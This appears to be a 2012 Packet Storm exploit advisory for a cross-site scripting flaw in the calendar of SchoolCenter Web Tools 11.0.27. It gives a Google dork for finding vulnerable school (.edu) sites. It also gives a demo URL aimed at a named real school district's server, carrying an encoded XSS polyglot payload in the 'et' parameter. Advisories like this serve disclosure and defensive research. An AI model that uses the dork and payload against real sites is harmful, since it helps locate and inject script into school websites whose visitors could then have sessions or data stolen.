SchoolCenter Web Tools version 11.0.27 suffers from a cross site scripting vulnerability. This is an old issue that was never fixed by the vendor in earlier releases.
9c557412d22448c819499d4a9671df660ca09aac0b5f82b040390b919fbe324c# Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting
# Date: 11.04.2012
# Author: Sony and Flexxpoint
# Software Link: www.thinqed.com
# Google Dorks: inurl:/education/components/calendar/ site:edu
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html
..................................................................
Well, we have xss in calendar.
Demo:
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday
http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG
etc..
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed